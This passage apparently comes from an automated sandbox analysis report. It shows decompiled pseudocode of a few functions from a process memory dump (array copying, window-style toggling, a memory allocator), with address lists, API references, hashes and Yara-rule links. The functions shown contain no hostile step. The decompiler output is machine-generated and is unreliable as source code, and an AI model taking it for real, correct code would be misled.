						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L0042F630();
							L00430EC8(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L0042F638();
							L00430EC8(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}





























                                                                    0x0043171c
                                                                    0x00431728
                                                                    0x0043172e
                                                                    0x00431734
                                                                    0x00431744
                                                                    0x0043174b
                                                                    0x0043174b
                                                                    0x00431756
                                                                    0x00431764
                                                                    0x004318ef
                                                                    0x004318f6
                                                                    0x004318f7
                                                                    0x00000000
                                                                    0x0043176a
                                                                    0x0043176d
                                                                    0x0043178b
                                                                    0x0043176f
                                                                    0x0043177a
                                                                    0x0043177a
                                                                    0x0043179a
                                                                    0x004317a6
                                                                    0x004317a9
                                                                    0x00431816
                                                                    0x0043181c
                                                                    0x0043181d
                                                                    0x00431823
                                                                    0x00431824
                                                                    0x00431826
                                                                    0x0043182b
                                                                    0x0043182f
                                                                    0x00431831
                                                                    0x00431831
                                                                    0x0043183c
                                                                    0x00431847
                                                                    0x00431852
                                                                    0x0043185b
                                                                    0x0043185e
                                                                    0x0043187a
                                                                    0x00431881
                                                                    0x0043188c
                                                                    0x004318a3
                                                                    0x004318a8
                                                                    0x004318bc
                                                                    0x004318c1
                                                                    0x004318d4
                                                                    0x004318d4
                                                                    0x004318dd
                                                                    0x00431860
                                                                    0x00431860
                                                                    0x00431861
                                                                    0x00431867
                                                                    0x0043186d
                                                                    0x0043186f
                                                                    0x00431871
                                                                    0x00431874
                                                                    0x00431877
                                                                    0x00431877
                                                                    0x0043187a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0043187a
                                                                    0x004317ab
                                                                    0x004317ab
                                                                    0x004317ac
                                                                    0x004317ae
                                                                    0x004317b4
                                                                    0x004317b6
                                                                    0x004317c5
                                                                    0x004317c6
                                                                    0x004317d0
                                                                    0x004317d1
                                                                    0x004317d6
                                                                    0x004317e1
                                                                    0x004317e2
                                                                    0x004317ec
                                                                    0x004317ed
                                                                    0x004317f2
                                                                    0x0043180d
                                                                    0x0043180f
                                                                    0x00431810
                                                                    0x00431813
                                                                    0x00431813
                                                                    0x00000000
                                                                    0x004317b4
                                                                    0x004317a9

                                                                    APIs
                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004317D1
                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004317ED
                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00431826
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004318A3
                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004318BC
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 004318F7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                    • String ID:
                                                                    • API String ID: 351091851-0
                                                                    • Opcode ID: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                    • Instruction ID: ede279f2d9249a03c5eeb803d5e3445196a0ad83b08d93498a0369a0c14e8414
                                                                    • Opcode Fuzzy Hash: 040e7940f355aaa7652d1378d9b08393b08e43244b2170bcb39dc03bfc7fe70c
                                                                    • Instruction Fuzzy Hash: 41512D75A002299FCB62DB59CD81BD9B3FCAF0C304F4455EAE508E7212D634AF858F58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AE6F8, Relevance: 9.1, APIs: 6, Instructions: 66COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E006AE6F8(signed int __eax) {
				intOrPtr* _t14;
				signed int _t18;
				intOrPtr* _t19;
				intOrPtr* _t23;
				signed int _t26;
				long _t27;
				intOrPtr* _t29;
				intOrPtr* _t33;
				signed int _t37;
				intOrPtr* _t38;

				_t37 = __eax;
				 *0x6d6827 = __eax ^ 0x00000001;
				_t14 =  *0x6cdec4; // 0x6d579c
				_t18 = GetWindowLongW( *( *_t14 + 0x188), 0xffffffec) & 0xffffff00 | (_t17 & 0x00000080) == 0x00000000;
				if(_t37 != _t18) {
					_t19 =  *0x6cdec4; // 0x6d579c
					SetWindowPos( *( *_t19 + 0x188), 0, 0, 0, 0, 0, 0x97);
					_t23 =  *0x6cdec4; // 0x6d579c
					_t26 = GetWindowLongW( *( *_t23 + 0x188), 0xffffffec);
					if(_t37 == 0) {
						_t27 = _t26 | 0x00000080;
					} else {
						_t27 = _t26 & 0xffffff7f;
					}
					_t38 =  *0x6cdec4; // 0x6d579c
					SetWindowLongW( *( *_t38 + 0x188), 0xffffffec, _t27);
					if(_t37 == 0) {
						_t29 =  *0x6cdec4; // 0x6d579c
						return SetWindowPos( *( *_t29 + 0x188), 0, 0, 0, 0, 0, 0x57);
					} else {
						_t33 =  *0x6cdec4; // 0x6d579c
						return ShowWindow( *( *_t33 + 0x188), 5);
					}
				}
				return _t18;
			}













                                                                    0x006ae6f9
                                                                    0x006ae6ff
                                                                    0x006ae704
                                                                    0x006ae71b
                                                                    0x006ae720
                                                                    0x006ae735
                                                                    0x006ae743
                                                                    0x006ae748
                                                                    0x006ae758
                                                                    0x006ae75f
                                                                    0x006ae768
                                                                    0x006ae761
                                                                    0x006ae761
                                                                    0x006ae761
                                                                    0x006ae76d
                                                                    0x006ae77f
                                                                    0x006ae786
                                                                    0x006ae7ab
                                                                    0x00000000
                                                                    0x006ae788
                                                                    0x006ae78a
                                                                    0x00000000
                                                                    0x006ae798
                                                                    0x006ae786
                                                                    0x006ae7bf

                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006AE714
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,006B78BD,00000000,006B81F9), ref: 006AE743
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006AE758
                                                                    • SetWindowLongW.USER32 ref: 006AE77F
                                                                    • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 006AE798
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 006AE7B9
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Window$Long$Show
                                                                    • String ID:
                                                                    • API String ID: 3609083571-0
                                                                    • Opcode ID: 5cdc2a2f03025ac3e3b3afbb97f1bf29b70dcad7f16aa9e547f2343e461a08eb
                                                                    • Instruction ID: c5f2d3f14be40374ea6ae40072baf741f42d7864aa45c80e1917733d0618a2ec
                                                                    • Opcode Fuzzy Hash: 5cdc2a2f03025ac3e3b3afbb97f1bf29b70dcad7f16aa9e547f2343e461a08eb
                                                                    • Instruction Fuzzy Hash: FC111C75745200AFD700EB68DD81FE237EAAB9E314F4541A5F6158F3E2CA65EC40DB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405A04, Relevance: 9.0, APIs: 7, Instructions: 298sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E00405A04(signed int __eax) {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				intOrPtr* _t99;
				signed int _t104;
				signed int _t109;
				signed int _t110;
				intOrPtr* _t114;
				void* _t116;
				intOrPtr* _t121;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t132;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				unsigned int _t141;
				signed int _t142;
				void* _t144;
				intOrPtr* _t147;
				intOrPtr _t148;
				signed int _t150;
				long _t156;
				intOrPtr _t159;
				signed int _t162;

				_t95 = __eax;
				_t129 =  *0x6cf05d; // 0x0
				if(__eax > 0xa2c) {
					__eflags = __eax - 0x40a2c;
					if(__eax > 0x40a2c) {
						_pop(_t120);
						__eflags = __eax;
						if(__eax >= 0) {
							_push(_t120);
							_t162 = __eax;
							_t2 = _t162 + 0x10010; // 0x10110
							_t156 = _t2 - 0x00000001 + 0x00000004 & 0xffff0000;
							_t121 = VirtualAlloc(0, _t156, 0x101000, 4);
							if(_t121 != 0) {
								_t147 = _t121;
								 *((intOrPtr*)(_t147 + 8)) = _t162;
								 *(_t147 + 0xc) = _t156 | 0x00000004;
								E00405764();
								_t99 =  *0x6d1b84; // 0x6d1b80
								 *_t147 = 0x6d1b80;
								 *0x6d1b84 = _t121;
								 *((intOrPtr*)(_t147 + 4)) = _t99;
								 *_t99 = _t121;
								 *0x6d1b7c = 0;
								_t121 = _t121 + 0x10;
							}
							return _t121;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t67 = _t95 + 0xd3; // 0x1d3
						_t125 = (_t67 & 0xffffff00) + 0x30;
						__eflags = _t129;
						if(__eflags != 0) {
							while(1) {
								asm("lock cmpxchg [0x6cfaec], ah");
								if(__eflags == 0) {
									goto L42;
								}
								asm("pause");
								__eflags =  *0x6cf98d;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									asm("lock cmpxchg [0x6cfaec], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L42;
							}
						}
						L42:
						_t68 = _t125 - 0xb30; // -2445
						_t141 = _t68;
						_t142 = _t141 >> 0xd;
						_t131 = _t141 >> 8;
						_t104 = 0xffffffff << _t131 &  *(0x6cfafc + _t142 * 4);
						__eflags = 0xffffffff;
						if(0xffffffff == 0) {
							_t132 = _t142;
							__eflags = 0xfffffffe << _t132 &  *0x6cfaf8;
							if((0xfffffffe << _t132 &  *0x6cfaf8) == 0) {
								_t133 =  *0x6cfaf4; // 0x0
								_t134 = _t133 - _t125;
								__eflags = _t134;
								if(_t134 < 0) {
									_t109 = E004056E8(_t125);
								} else {
									_t110 =  *0x6cfaf0; // 0x3813970
									_t109 = _t110 - _t125;
									 *0x6cfaf0 = _t109;
									 *0x6cfaf4 = _t134;
									 *(_t109 - 4) = _t125 | 0x00000002;
								}
								 *0x6cfaec = 0;
								return _t109;
							} else {
								asm("bsf edx, eax");
								asm("bsf ecx, eax");
								_t135 = _t132 | _t142 << 0x00000005;
								goto L50;
							}
						} else {
							asm("bsf eax, eax");
							_t135 = _t131 & 0xffffffe0 | _t104;
							L50:
							_push(_t152);
							_push(_t145);
							_t148 = 0x6cfb7c + _t135 * 8;
							_t159 =  *((intOrPtr*)(_t148 + 4));
							_t114 =  *((intOrPtr*)(_t159 + 4));
							 *((intOrPtr*)(_t148 + 4)) = _t114;
							 *_t114 = _t148;
							__eflags = _t148 - _t114;
							if(_t148 == _t114) {
								asm("rol eax, cl");
								_t80 = 0x6cfafc + _t142 * 4;
								 *_t80 =  *(0x6cfafc + _t142 * 4) & 0xfffffffe;
								__eflags =  *_t80;
								if( *_t80 == 0) {
									asm("btr [0x6cfaf8], edx");
								}
							}
							_t150 = 0xfffffff0 &  *(_t159 - 4);
							_t144 = 0xfffffff0 - _t125;
							__eflags = 0xfffffff0;
							if(0xfffffff0 == 0) {
								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
								__eflags =  *_t89;
							} else {
								_t116 = _t125 + _t159;
								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
								__eflags = 0xfffffff0 - 0xb30;
								if(0xfffffff0 >= 0xb30) {
									E0040561C(_t116, 0xfffffffffffffff3, _t144);
								}
							}
							_t93 = _t125 + 2; // 0x1a5
							 *(_t159 - 4) = _t93;
							 *0x6cfaec = 0;
							return _t159;
						}
					}
				} else {
					__eflags = __cl;
					_t6 = __edx + 0x6cf994; // 0xc8c8c8c8
					__eax =  *_t6 & 0x000000ff;
					__ebx = 0x6c5084 + ( *_t6 & 0x000000ff) * 8;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L5;
							}
							__ebx = __ebx + 0x20;
							__eflags = __ebx;
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__ebx != 0) {
								__ebx = __ebx + 0x20;
								__eflags = __ebx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__ebx != 0) {
									__ebx = __ebx - 0x40;
									asm("pause");
									__eflags =  *0x6cf98d;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [ebx], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
								}
							}
							goto L5;
						}
					}
					L5:
					__edx =  *(__ebx + 8);
					__eax =  *(__edx + 0x10);
					__ecx = 0xfffffff8;
					__eflags = __edx - __ebx;
					if(__edx == __ebx) {
						__edx =  *(__ebx + 0x18);
						__ecx =  *(__ebx + 2) & 0x0000ffff;
						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
						__eflags = __eax -  *(__ebx + 0x14);
						if(__eax >  *(__ebx + 0x14)) {
							_push(__esi);
							_push(__edi);
							__eflags =  *0x6cf05d;
							if(__eflags != 0) {
								while(1) {
									__eax = 0x100;
									asm("lock cmpxchg [0x6cfaec], ah");
									if(__eflags == 0) {
										goto L22;
									}
									asm("pause");
									__eflags =  *0x6cf98d;
									if(__eflags != 0) {
										continue;
									} else {
										Sleep(0);
										__eax = 0x100;
										asm("lock cmpxchg [0x6cfaec], ah");
										if(__eflags != 0) {
											Sleep(0xa);
											continue;
										}
									}
									goto L22;
								}
							}
							L22:
							 *(__ebx + 1) =  *(__ebx + 1) &  *0x6cfaf8;
							__eflags =  *(__ebx + 1) &  *0x6cfaf8;
							if(( *(__ebx + 1) &  *0x6cfaf8) == 0) {
								__ecx =  *(__ebx + 4) & 0x0000ffff;
								__edi =  *0x6cfaf4; // 0x0
								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
									__eax =  *(__ebx + 6) & 0x0000ffff;
									__edi = __eax;
									__eax = E004056E8(__eax);
									__esi = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										goto L35;
									} else {
										 *0x6cfaec = __al;
										 *__ebx = __al;
										_pop(__edi);
										_pop(__esi);
										_pop(__ebx);
										return __eax;
									}
								} else {
									__esi =  *0x6cfaf0; // 0x3813970
									__ecx =  *(__ebx + 6) & 0x0000ffff;
									__edx = __ecx + 0xb30;
									__eflags = __edi - __ecx + 0xb30;
									if(__edi >= __ecx + 0xb30) {
										__edi = __ecx;
									}
									__esi = __esi - __edi;
									 *0x6cfaf4 =  *0x6cfaf4 - __edi;
									 *0x6cfaf0 = __esi;
									goto L35;
								}
							} else {
								asm("bsf eax, esi");
								__esi = __eax * 8;
								__ecx =  *(0x6cfafc + __eax * 4);
								asm("bsf ecx, ecx");
								__ecx =  *(0x6cfafc + __eax * 4) + __eax * 8 * 4;
								__edi = 0x6cfb7c + ( *(0x6cfafc + __eax * 4) + __eax * 8 * 4) * 8;
								__esi =  *(__edi + 4);
								__edx =  *(__esi + 4);
								 *(__edi + 4) = __edx;
								 *__edx = __edi;
								__eflags = __edi - __edx;
								if(__edi == __edx) {
									__edx = 0xfffffffe;
									asm("rol edx, cl");
									_t38 = 0x6cfafc + __eax * 4;
									 *_t38 =  *(0x6cfafc + __eax * 4) & 0xfffffffe;
									__eflags =  *_t38;
									if( *_t38 == 0) {
										asm("btr [0x6cfaf8], eax");
									}
								}
								__edi = 0xfffffff0;
								__edi = 0xfffffff0 &  *(__esi - 4);
								__eflags = 0xfffffff0 - 0x10a60;
								if(0xfffffff0 < 0x10a60) {
									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
									__eflags =  *_t52;
								} else {
									__edx = __edi;
									__edi =  *(__ebx + 6) & 0x0000ffff;
									__edx = __edx - __edi;
									__eax = __edi + __esi;
									__ecx = __edx + 3;
									 *(__eax - 4) = __ecx;
									 *(__edx + __eax - 8) = __edx;
									__eax = E0040561C(__eax, __ecx, __edx);
								}
								L35:
								_t56 = __edi + 6; // 0x6
								__ecx = _t56;
								 *(__esi - 4) = _t56;
								__eax = 0;
								 *0x6cfaec = __al;
								 *__esi = __ebx;
								 *((intOrPtr*)(__esi + 0x10)) = 0;
								 *((intOrPtr*)(__esi + 0x14)) = 1;
								 *(__ebx + 0x18) = __esi;
								_t61 = __esi + 0x20; // 0x3813990
								__eax = _t61;
								__ecx =  *(__ebx + 2) & 0x0000ffff;
								__edx = __ecx + __eax;
								 *(__ebx + 0x10) = __ecx + __eax;
								__edi = __edi + __esi;
								__edi = __edi - __ecx;
								__eflags = __edi;
								 *(__ebx + 0x14) = __edi;
								 *__ebx = 0;
								 *(__eax - 4) = __esi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __eax;
							}
						} else {
							_t19 = __edx + 0x14;
							 *_t19 =  *(__edx + 0x14) + 1;
							__eflags =  *_t19;
							 *(__ebx + 0x10) = __ecx;
							 *__ebx = 0;
							 *(__eax - 4) = __edx;
							_pop(__ebx);
							return __eax;
						}
					} else {
						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
						__ecx = 0xfffffff8 &  *(__eax - 4);
						__eflags = 0xfffffff8;
						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
						 *(__eax - 4) = __edx;
						if(0xfffffff8 == 0) {
							__ecx =  *(__edx + 8);
							 *(__ecx + 0xc) = __ebx;
							 *(__ebx + 8) = __ecx;
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						} else {
							 *__ebx = 0;
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}





























                                                                    0x00405a04
                                                                    0x00405a10
                                                                    0x00405a16
                                                                    0x00405c64
                                                                    0x00405c69
                                                                    0x00405d7c
                                                                    0x00405d7d
                                                                    0x00405d7f
                                                                    0x004057b0
                                                                    0x004057b4
                                                                    0x004057b6
                                                                    0x004057c0
                                                                    0x004057d5
                                                                    0x004057d9
                                                                    0x004057db
                                                                    0x004057dd
                                                                    0x004057e3
                                                                    0x004057e6
                                                                    0x004057eb
                                                                    0x004057f0
                                                                    0x004057f6
                                                                    0x004057fc
                                                                    0x004057ff
                                                                    0x00405801
                                                                    0x00405808
                                                                    0x00405808
                                                                    0x00405811
                                                                    0x00405d85
                                                                    0x00405d85
                                                                    0x00405d87
                                                                    0x00405d87
                                                                    0x00405c6f
                                                                    0x00405c6f
                                                                    0x00405c7b
                                                                    0x00405c7e
                                                                    0x00405c80
                                                                    0x00405c28
                                                                    0x00405c2d
                                                                    0x00405c35
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405c37
                                                                    0x00405c39
                                                                    0x00405c40
                                                                    0x00000000
                                                                    0x00405c42
                                                                    0x00405c44
                                                                    0x00405c4e
                                                                    0x00405c56
                                                                    0x00405c5a
                                                                    0x00000000
                                                                    0x00405c5a
                                                                    0x00405c56
                                                                    0x00000000
                                                                    0x00405c40
                                                                    0x00405c28
                                                                    0x00405c82
                                                                    0x00405c82
                                                                    0x00405c82
                                                                    0x00405c8a
                                                                    0x00405c8d
                                                                    0x00405c97
                                                                    0x00405c97
                                                                    0x00405c9e
                                                                    0x00405cb1
                                                                    0x00405cb5
                                                                    0x00405cbb
                                                                    0x00405cd4
                                                                    0x00405cda
                                                                    0x00405cda
                                                                    0x00405cdc
                                                                    0x00405cfa
                                                                    0x00405cde
                                                                    0x00405cde
                                                                    0x00405ce3
                                                                    0x00405ce5
                                                                    0x00405cea
                                                                    0x00405cf3
                                                                    0x00405cf3
                                                                    0x00405cff
                                                                    0x00405d07
                                                                    0x00405cbd
                                                                    0x00405cbd
                                                                    0x00405cc7
                                                                    0x00405ccf
                                                                    0x00000000
                                                                    0x00405ccf
                                                                    0x00405ca0
                                                                    0x00405ca3
                                                                    0x00405ca6
                                                                    0x00405d08
                                                                    0x00405d08
                                                                    0x00405d09
                                                                    0x00405d0a
                                                                    0x00405d11
                                                                    0x00405d14
                                                                    0x00405d17
                                                                    0x00405d1a
                                                                    0x00405d1c
                                                                    0x00405d1e
                                                                    0x00405d25
                                                                    0x00405d27
                                                                    0x00405d27
                                                                    0x00405d27
                                                                    0x00405d2e
                                                                    0x00405d30
                                                                    0x00405d30
                                                                    0x00405d2e
                                                                    0x00405d3c
                                                                    0x00405d41
                                                                    0x00405d41
                                                                    0x00405d43
                                                                    0x00405d64
                                                                    0x00405d64
                                                                    0x00405d64
                                                                    0x00405d45
                                                                    0x00405d45
                                                                    0x00405d4b
                                                                    0x00405d4e
                                                                    0x00405d52
                                                                    0x00405d58
                                                                    0x00405d5a
                                                                    0x00405d5a
                                                                    0x00405d58
                                                                    0x00405d69
                                                                    0x00405d6c
                                                                    0x00405d6f
                                                                    0x00405d7b
                                                                    0x00405d7b
                                                                    0x00405c9e
                                                                    0x00405a1c
                                                                    0x00405a1c
                                                                    0x00405a1e
                                                                    0x00405a1e
                                                                    0x00405a25
                                                                    0x00405a2c
                                                                    0x00405a84
                                                                    0x00405a84
                                                                    0x00405a89
                                                                    0x00405a8d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405a8f
                                                                    0x00405a8f
                                                                    0x00405a92
                                                                    0x00405a97
                                                                    0x00405a9b
                                                                    0x00405a9d
                                                                    0x00405a9d
                                                                    0x00405aa0
                                                                    0x00405aa5
                                                                    0x00405aa9
                                                                    0x00405aab
                                                                    0x00405aae
                                                                    0x00405ab0
                                                                    0x00405ab7
                                                                    0x00000000
                                                                    0x00405ab9
                                                                    0x00405abb
                                                                    0x00405ac0
                                                                    0x00405ac5
                                                                    0x00405ac9
                                                                    0x00405ad1
                                                                    0x00000000
                                                                    0x00405ad1
                                                                    0x00405ac9
                                                                    0x00405ab7
                                                                    0x00405aa9
                                                                    0x00000000
                                                                    0x00405a9b
                                                                    0x00405a84
                                                                    0x00405a2e
                                                                    0x00405a2e
                                                                    0x00405a31
                                                                    0x00405a34
                                                                    0x00405a39
                                                                    0x00405a3b
                                                                    0x00405a54
                                                                    0x00405a57
                                                                    0x00405a5b
                                                                    0x00405a5d
                                                                    0x00405a60
                                                                    0x00405ad8
                                                                    0x00405ad9
                                                                    0x00405ada
                                                                    0x00405ae1
                                                                    0x00405ae3
                                                                    0x00405ae3
                                                                    0x00405ae8
                                                                    0x00405af0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405af2
                                                                    0x00405af4
                                                                    0x00405afb
                                                                    0x00000000
                                                                    0x00405afd
                                                                    0x00405aff
                                                                    0x00405b04
                                                                    0x00405b09
                                                                    0x00405b11
                                                                    0x00405b15
                                                                    0x00000000
                                                                    0x00405b15
                                                                    0x00405b11
                                                                    0x00000000
                                                                    0x00405afb
                                                                    0x00405ae3
                                                                    0x00405b1c
                                                                    0x00405b20
                                                                    0x00405b20
                                                                    0x00405b26
                                                                    0x00405b98
                                                                    0x00405b9c
                                                                    0x00405ba2
                                                                    0x00405ba4
                                                                    0x00405bcc
                                                                    0x00405bd0
                                                                    0x00405bd2
                                                                    0x00405bd7
                                                                    0x00405bd9
                                                                    0x00405bdb
                                                                    0x00000000
                                                                    0x00405bdd
                                                                    0x00405bdd
                                                                    0x00405be2
                                                                    0x00405be4
                                                                    0x00405be5
                                                                    0x00405be6
                                                                    0x00405be7
                                                                    0x00405be7
                                                                    0x00405ba6
                                                                    0x00405ba6
                                                                    0x00405bac
                                                                    0x00405bb0
                                                                    0x00405bb6
                                                                    0x00405bb8
                                                                    0x00405bba
                                                                    0x00405bba
                                                                    0x00405bbc
                                                                    0x00405bbe
                                                                    0x00405bc4
                                                                    0x00000000
                                                                    0x00405bc4
                                                                    0x00405b28
                                                                    0x00405b28
                                                                    0x00405b2b
                                                                    0x00405b32
                                                                    0x00405b39
                                                                    0x00405b3c
                                                                    0x00405b3f
                                                                    0x00405b46
                                                                    0x00405b49
                                                                    0x00405b4c
                                                                    0x00405b4f
                                                                    0x00405b51
                                                                    0x00405b53
                                                                    0x00405b55
                                                                    0x00405b5a
                                                                    0x00405b5c
                                                                    0x00405b5c
                                                                    0x00405b5c
                                                                    0x00405b63
                                                                    0x00405b65
                                                                    0x00405b65
                                                                    0x00405b63
                                                                    0x00405b6c
                                                                    0x00405b71
                                                                    0x00405b74
                                                                    0x00405b7a
                                                                    0x00405be8
                                                                    0x00405be8
                                                                    0x00405be8
                                                                    0x00405b7c
                                                                    0x00405b7c
                                                                    0x00405b7e
                                                                    0x00405b82
                                                                    0x00405b84
                                                                    0x00405b87
                                                                    0x00405b8a
                                                                    0x00405b8d
                                                                    0x00405b91
                                                                    0x00405b91
                                                                    0x00405bed
                                                                    0x00405bed
                                                                    0x00405bed
                                                                    0x00405bf0
                                                                    0x00405bf3
                                                                    0x00405bf5
                                                                    0x00405bfa
                                                                    0x00405bfc
                                                                    0x00405bff
                                                                    0x00405c06
                                                                    0x00405c09
                                                                    0x00405c09
                                                                    0x00405c0c
                                                                    0x00405c10
                                                                    0x00405c13
                                                                    0x00405c16
                                                                    0x00405c18
                                                                    0x00405c18
                                                                    0x00405c1a
                                                                    0x00405c1d
                                                                    0x00405c20
                                                                    0x00405c23
                                                                    0x00405c24
                                                                    0x00405c25
                                                                    0x00405c26
                                                                    0x00405c26
                                                                    0x00405a62
                                                                    0x00405a62
                                                                    0x00405a62
                                                                    0x00405a62
                                                                    0x00405a66
                                                                    0x00405a69
                                                                    0x00405a6c
                                                                    0x00405a6f
                                                                    0x00405a70
                                                                    0x00405a70
                                                                    0x00405a3d
                                                                    0x00405a3d
                                                                    0x00405a41
                                                                    0x00405a41
                                                                    0x00405a44
                                                                    0x00405a47
                                                                    0x00405a4a
                                                                    0x00405a74
                                                                    0x00405a77
                                                                    0x00405a7a
                                                                    0x00405a7d
                                                                    0x00405a80
                                                                    0x00405a81
                                                                    0x00405a4c
                                                                    0x00405a4c
                                                                    0x00405a4f
                                                                    0x00405a50
                                                                    0x00405a50
                                                                    0x00405a4a
                                                                    0x00405a3b

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405ABB
                                                                    • Sleep.KERNEL32(0000000A,00000000,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AD1
                                                                    • Sleep.KERNEL32(00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405AFF
                                                                    • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000,0040FBAD), ref: 00405B15
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
